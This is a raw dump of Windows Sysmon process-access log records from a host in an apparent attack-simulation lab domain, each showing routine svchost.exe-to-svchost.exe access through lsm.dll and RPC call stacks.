13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.154{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.123{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 